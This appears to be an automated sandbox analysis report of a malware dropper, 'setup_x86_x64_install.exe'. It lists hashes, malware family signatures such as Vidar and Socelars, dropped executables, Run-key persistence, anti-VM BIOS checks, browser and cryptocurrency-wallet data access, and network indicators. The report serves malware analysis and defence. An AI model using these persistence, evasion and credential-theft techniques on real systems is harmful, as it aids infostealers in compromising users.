Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
02-12-2021 07:35
211202-je6zgsfge4 1010-09-2021 20:31
210910-za2rzaaeh3 1010-09-2021 19:40
210910-ydvmdsdffp 1010-09-2021 12:06
210910-n9s4bsdbep 1010-09-2021 05:37
210910-gbjcxahdh2 1009-09-2021 22:16
210909-17av7aghb7 1009-09-2021 22:12
210909-14mqksgha9 1009-09-2021 22:12
210909-14l42sgha8 1009-09-2021 22:11
210909-14e1qsgha7 1009-09-2021 22:11
210909-138lnacacn 10Analysis
-
max time kernel
711s -
max time network
1200s -
platform
windows11_x64 -
resource
win11 -
submitted
10-09-2021 05:37
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral10
Sample
setup_x86_x64_install.exe
Resource
win10-de
General
-
Target
setup_x86_x64_install.exe
-
Size
4.3MB
-
MD5
6d18c8e8ab9051f7a70b89ff7bb0ec35
-
SHA1
265311e2afd9f59e824f4b77162cf3dfa278eb7e
-
SHA256
8fe6c86b038ce91a991fe6eb8a9b323bb37b554ff6b4e5c18de3fe52d4aedf6d
-
SHA512
249bf79dc90d4662b942c7eed2a7b7816b749f6d5f7bc190bba05f826fa143d0b44f58054d8649b8626884c5fcbd1cea8abd625dc701d44b7aaac84fc74e47ff
Malware Config
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5920 4952 rundll32.exe 23 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4720 4952 rundll32.exe 23 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3224 4952 rundll32.exe 23 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2440 4952 rUNdlL32.eXe 23 -
Socelars Payload 2 IoCs
resource yara_rule behavioral5/files/0x000100000002b1be-194.dat family_socelars behavioral5/files/0x000100000002b1be-175.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 60 IoCs
description pid Process procid_target PID 5204 created 3800 5204 WerFault.exe 109 PID 5252 created 1208 5252 WerFault.exe 100 PID 5368 created 3812 5368 WerFault.exe 94 PID 5356 created 912 5356 WerFault.exe 105 PID 5144 created 5948 5144 Process not Found 133 PID 2604 created 956 2604 WerFault.exe 104 PID 5536 created 6040 5536 WerFault.exe 182 PID 5092 created 4104 5092 WerFault.exe 137 PID 5476 created 4580 5476 WerFault.exe 140 PID 6040 created 1696 6040 WerFault.exe 213 PID 5988 created 3060 5988 WerFault.exe 193 PID 4532 created 5264 4532 WerFault.exe 118 PID 2140 created 4780 2140 WerFault.exe 171 PID 6124 created 4644 6124 Process not Found 154 PID 5920 created 6132 5920 WerFault.exe 419 PID 4596 created 4720 4596 Rimasta.exe.com 244 PID 5608 created 4944 5608 WerFault.exe 272 PID 888 created 5744 888 WerFault.exe 429 PID 6492 created 584 6492 hibkxFCwwIU1jT3ewPqSHPZH.exe 285 PID 7112 created 3092 7112 WerFault.exe 262 PID 6732 created 7040 6732 WerFault.exe 317 PID 6332 created 7172 6332 Cleaner.exe 324 PID 6852 created 1728 6852 Process not Found 329 PID 3196 created 6804 3196 WerFault.exe 307 PID 3032 created 6856 3032 WerFault.exe 301 PID 5896 created 6796 5896 rtk3sX09oybmTouiBz9UXGd1.exe 454 PID 7568 created 6252 7568 WerFault.exe 296 PID 5928 created 1608 5928 WerFault.exe 333 PID 1140 created 6164 1140 WerFault.exe 707 PID 8092 created 7760 8092 WerFault.exe 352 PID 1812 created 7772 1812 Process not Found 351 PID 4792 created 7792 4792 WerFault.exe 410 PID 5032 created 6844 5032 WerFault.exe 302 PID 7828 created 3428 7828 WerFault.exe 326 PID 9108 created 6796 9108 WerFault.exe 454 PID 4792 created 8268 4792 WerFault.exe 461 PID 4640 created 7108 4640 WMIADAP.EXE 457 PID 6068 created 8260 6068 WerFault.exe 463 PID 6164 created 8164 6164 WerFault.exe 485 PID 7536 created 7416 7536 WerFault.exe 484 PID 7524 created 6464 7524 WerFault.exe 527 PID 8704 created 2212 8704 WerFault.exe 528 PID 5592 created 6280 5592 WerFault.exe 551 PID 1104 created 7504 1104 WerFault.exe 561 PID 7460 created 7136 7460 WerFault.exe 568 PID 7376 created 9020 7376 msedge.exe 501 PID 7292 created 8888 7292 WerFault.exe 572 PID 5220 created 8652 5220 WerFault.exe 489 PID 6596 created 5756 6596 WerFault.exe 604 PID 1528 created 2372 1528 WerFault.exe 607 PID 2072 created 5712 2072 bwWgtNFdD4gmaoUJi3mbqOX5.exe 628 PID 2536 created 9144 2536 WerFault.exe 620 PID 7692 created 5900 7692 WerFault.exe 619 PID 3400 created 6968 3400 WerFault.exe 618 PID 5724 created 7392 5724 WerFault.exe 624 PID 7088 created 6352 7088 WerFault.exe 625 PID 2712 created 4940 2712 WerFault.exe 672 PID 8676 created 2004 8676 WerFault.exe 670 PID 8544 created 5436 8544 WerFault.exe 681 PID 6164 created 8592 6164 WerFault.exe 691 -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
resource yara_rule behavioral5/memory/3812-302-0x0000000004970000-0x0000000004A41000-memory.dmp family_vidar -
resource yara_rule behavioral5/files/0x000200000002b1ac-155.dat aspack_v212_v242 behavioral5/files/0x000200000002b1ac-156.dat aspack_v212_v242 behavioral5/files/0x000100000002b1b1-154.dat aspack_v212_v242 behavioral5/files/0x000100000002b1b1-159.dat aspack_v212_v242 behavioral5/files/0x000100000002b1b3-160.dat aspack_v212_v242 behavioral5/files/0x000100000002b1b3-161.dat aspack_v212_v242 -
Blocklisted process makes network request 64 IoCs
flow pid Process 85 5932 cmd.exe 101 5932 cmd.exe 256 6788 schtasks.exe 258 6788 schtasks.exe 260 6788 schtasks.exe 261 6788 schtasks.exe 278 6788 schtasks.exe 279 6788 schtasks.exe 280 6788 schtasks.exe 391 3952 MsiExec.exe 397 3952 MsiExec.exe 400 3952 MsiExec.exe 403 3952 MsiExec.exe 407 3952 MsiExec.exe 411 3952 MsiExec.exe 414 3952 MsiExec.exe 419 3952 MsiExec.exe 423 3952 MsiExec.exe 426 3952 MsiExec.exe 428 3952 MsiExec.exe 430 3952 MsiExec.exe 432 3952 MsiExec.exe 435 3952 MsiExec.exe 437 3952 MsiExec.exe 439 3952 MsiExec.exe 442 3952 MsiExec.exe 444 3952 MsiExec.exe 447 3952 MsiExec.exe 448 3952 MsiExec.exe 451 3952 MsiExec.exe 455 3952 MsiExec.exe 459 3952 MsiExec.exe 461 3952 MsiExec.exe 462 3952 MsiExec.exe 463 3952 MsiExec.exe 464 3952 MsiExec.exe 466 3952 MsiExec.exe 471 3952 MsiExec.exe 475 3952 MsiExec.exe 471 3952 MsiExec.exe 478 3952 MsiExec.exe 475 3952 MsiExec.exe 481 3952 MsiExec.exe 484 3952 MsiExec.exe 485 3952 MsiExec.exe 487 3952 MsiExec.exe 485 3952 MsiExec.exe 489 3952 MsiExec.exe 487 3952 MsiExec.exe 491 3952 MsiExec.exe 499 3952 MsiExec.exe 505 3952 MsiExec.exe 508 3952 MsiExec.exe 509 3952 MsiExec.exe 510 3952 MsiExec.exe 513 3952 MsiExec.exe 397 3952 MsiExec.exe 407 3952 MsiExec.exe 403 3952 MsiExec.exe 400 3952 MsiExec.exe 555 1864 MsiExec.exe 556 1864 MsiExec.exe 557 1864 MsiExec.exe 558 1864 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts 46807GHF____.exe File opened for modification C:\Windows\System32\drivers\SET4F6F.tmp DrvInst.exe File created C:\Windows\System32\drivers\SET4F6F.tmp DrvInst.exe File opened for modification C:\Windows\System32\drivers\tap0901.sys DrvInst.exe -
Executes dropped EXE 64 IoCs
pid Process 5012 setup_installer.exe 4900 setup_install.exe 912 Thu21624565bb917a.exe 956 Thu21a1ef054cac78a.exe 1036 Thu219d5fe8cf316.exe 1208 Thu2164f292a11ce.exe 1676 Thu21b93295136197.exe 3812 Thu214ce31cede21.exe 2012 Thu21b9847cb6727.exe 2320 Thu2102ff6cfe07c.exe 2344 Thu2156de5489c19.exe 2520 Thu21b93295136197.tmp 3800 Thu21df5caa1b78de6.exe 3524 Thu214aaca5625.exe 836 Thu21568b0ab8.exe 4544 Thu214aaca5625.tmp 1456 46807GHF____.exe 5280 tmpD82A_tmp.exe 5264 7807031.exe 5376 LzmwAqmV.exe 5500 1110687.exe 5664 Setup.exe 5820 Chrome 5.exe 5892 PublicDwlBrowser1100.exe 6040 WerFault.exe 4104 setup.exe 4580 udptest.exe 5448 DVORAK.exe 1696 ultramediaburner.exe 5564 msedge.exe 5640 m8mrKjXeyTMqbsozcD72tmQK.exe 1292 Setup.exe 5776 CompPkgSrv.exe 716 jhuuee.exe 5868 setup_2.tmp 3104 UltraMediaBurner.exe 4644 694179.exe 6100 stats.tmp 4540 BearVpn 3.exe 5256 3518457.exe 5472 setup_2.exe 1264 setup_2.tmp 3940 WinHoster.exe 1180 PING.EXE 4780 859642.exe 5240 postback.exe 4892 LzmwAqmV.exe 5928 WerFault.exe 5932 cmd.exe 6132 Conhost.exe 5304 WerFault.exe 5672 Adorarti.exe.com 2224 Sai.exe.com 1920 FoxyIDM62s.exe 1652 HWI.exe 2160 IDM1.tmp 6068 WerFault.exe 1700 BSKR.exe 4160 sqtvvs.exe 1696 ultramediaburner.exe 2640 ultramediaburner.tmp 4392 Cyherunoco.exe 3104 UltraMediaBurner.exe 5684 Kelaewetamu.exe -
Checks BIOS information in registry 2 TTPs 48 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8018192.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MSI61E7.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3556723.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1068919.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MSI61E7.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MSI7D9D.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e7SjvO9r8SXC6IYCM0xto3KI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1068919.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion IgxZc4krwxSWTzRtM93776c_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion izlZwVVv7MAPxS3UqznpIV6H.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MSI7D9D.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MSI7DAF.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 34D6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e7SjvO9r8SXC6IYCM0xto3KI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion pNVeVdgmOmHhs4guZvikrayx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MSI2A74.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion jNnKv6mul3RDLHYdVP9s8S4N.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion v64oKiMH7HZN96MLrVZd7TYl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion izlZwVVv7MAPxS3UqznpIV6H.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MSI61F9.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MSI2AB4.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion wGYNsb64ZBHISiHNwpu7Ju1A.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4100750.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6080168.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6080168.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MSI2AB4.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion IgxZc4krwxSWTzRtM93776c_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion xA3ufDa4echp_zyYV66dK7fh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MSI7DAF.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 34D6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8F12.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8F12.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion pNVeVdgmOmHhs4guZvikrayx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MSI2A74.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8018192.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion xA3ufDa4echp_zyYV66dK7fh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wGYNsb64ZBHISiHNwpu7Ju1A.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4100750.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 51F6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ScuYQUT_CwCQnZJOBp7bT9je.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3556723.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion jNnKv6mul3RDLHYdVP9s8S4N.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion v64oKiMH7HZN96MLrVZd7TYl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MSI61F9.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 51F6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ScuYQUT_CwCQnZJOBp7bT9je.exe -
Loads dropped DLL 64 IoCs
pid Process 4900 setup_install.exe 4900 setup_install.exe 4900 setup_install.exe 4900 setup_install.exe 4900 setup_install.exe 2520 Thu21b93295136197.tmp 2520 Thu21b93295136197.tmp 4544 Thu214aaca5625.tmp 5948 rundll32.exe 5868 setup_2.tmp 6100 stats.tmp 6100 stats.tmp 1264 setup_2.tmp 3060 rundll32.exe 5928 WerFault.exe 1596 installer.exe 1596 installer.exe 1596 installer.exe 1472 MsiExec.exe 1472 MsiExec.exe 4944 rundll32.exe 3952 MsiExec.exe 3952 MsiExec.exe 3952 MsiExec.exe 3952 MsiExec.exe 3952 MsiExec.exe 3952 MsiExec.exe 3952 MsiExec.exe 7792 rundll32.exe 5696 schtasks.exe 3952 MsiExec.exe 3952 MsiExec.exe 3952 MsiExec.exe 1596 installer.exe 8868 regsvr32.exe 3952 MsiExec.exe 3952 MsiExec.exe 7908 svrwebui.exe 7908 svrwebui.exe 7908 svrwebui.exe 7908 svrwebui.exe 7908 svrwebui.exe 7908 svrwebui.exe 6760 regsvr32.exe 6760 regsvr32.exe 6968 LNV9uPcVinX2zN55WKga4plA.exe 6968 LNV9uPcVinX2zN55WKga4plA.exe 3952 MsiExec.exe 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8152 3C69.exe 4328 mask_svc.exe 4328 mask_svc.exe 4328 mask_svc.exe 4328 mask_svc.exe 4328 mask_svc.exe 4328 mask_svc.exe 8008 vpn.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 15 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" tmpD82A_tmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\FarLabUninstaller\\Daesovewodi.exe\"" 46807GHF____.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" Conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Cleaner = "C:\\Users\\Admin\\AppData\\Roaming\\Cleaner\\Cleaner.exe --anbfs" Cleaner_Installation.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 1110687.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run aipackagechainer.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce OI5wr5AF4nqjsm6O4plsNMDM.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce JpzQpBam12FjgZJbPq6PqOMl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" JpzQpBam12FjgZJbPq6PqOMl.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\ aipackagechainer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" OI5wr5AF4nqjsm6O4plsNMDM.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Cleaner_Installation.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce tmpD82A_tmp.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce Conhost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA MSI7DAF.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4100750.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8F12.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3556723.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA MSI2A74.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA xA3ufDa4echp_zyYV66dK7fh.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA izlZwVVv7MAPxS3UqznpIV6H.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA MSI61E7.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA MSI61F9.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA MSI7D9D.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6080168.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 51F6.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA e7SjvO9r8SXC6IYCM0xto3KI.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1068919.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IgxZc4krwxSWTzRtM93776c_.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jNnKv6mul3RDLHYdVP9s8S4N.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8018192.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ScuYQUT_CwCQnZJOBp7bT9je.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA pNVeVdgmOmHhs4guZvikrayx.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA MSI2AB4.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA v64oKiMH7HZN96MLrVZd7TYl.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA wGYNsb64ZBHISiHNwpu7Ju1A.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 34D6.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\P: Cleaner_Installation.exe File opened (read-only) \??\B: MSIEXEC.EXE File opened (read-only) \??\G: MSIEXEC.EXE File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\V: MSIEXEC.EXE File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: Cleaner_Installation.exe File opened (read-only) \??\X: Cleaner_Installation.exe File opened (read-only) \??\Y: MSIEXEC.EXE File opened (read-only) \??\M: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\G: MSIEXEC.EXE File opened (read-only) \??\R: installer.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\M: MSIEXEC.EXE File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: MSIEXEC.EXE File opened (read-only) \??\H: MSIEXEC.EXE File opened (read-only) \??\Z: MSIEXEC.EXE File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\I: Cleaner_Installation.exe File opened (read-only) \??\B: Cleaner_Installation.exe File opened (read-only) \??\O: Cleaner_Installation.exe File opened (read-only) \??\K: MSIEXEC.EXE File opened (read-only) \??\L: MSIEXEC.EXE File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Y: MSIEXEC.EXE File opened (read-only) \??\O: MSIEXEC.EXE File opened (read-only) \??\T: MSIEXEC.EXE File opened (read-only) \??\J: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: MSIEXEC.EXE File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: MSIEXEC.EXE File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: Cleaner_Installation.exe File opened (read-only) \??\J: MSIEXEC.EXE File opened (read-only) \??\Z: MSIEXEC.EXE File opened (read-only) \??\L: installer.exe File opened (read-only) \??\F: MSIEXEC.EXE File opened (read-only) \??\T: MSIEXEC.EXE File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: MSIEXEC.EXE File opened (read-only) \??\X: installer.exe File opened (read-only) \??\T: MSIEXEC.EXE File opened (read-only) \??\N: MSIEXEC.EXE File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Y: Cleaner_Installation.exe File opened (read-only) \??\O: MSIEXEC.EXE File opened (read-only) \??\B: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Y: MSIEXEC.EXE -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 15 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 50 ipinfo.io 632 ipinfo.io 1 ipinfo.io 157 ipinfo.io 182 ipinfo.io 305 ipinfo.io 494 ipinfo.io 261 ipinfo.io 266 ipinfo.io 647 ipinfo.io 1 ip-api.com 18 ipinfo.io 151 ipinfo.io 313 ipinfo.io 572 ipinfo.io -
Drops file in System32 directory 16 IoCs
description ioc Process File opened for modification C:\Windows\System32\DriverStore\Temp\{4c82a130-41c7-2043-81f8-ef19762eea42}\SET4425.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{4c82a130-41c7-2043-81f8-ef19762eea42}\SET4426.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{4c82a130-41c7-2043-81f8-ef19762eea42}\SET4415.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{4c82a130-41c7-2043-81f8-ef19762eea42}\tap0901.cat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat DrvInst.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF tapinstall.exe File opened for modification 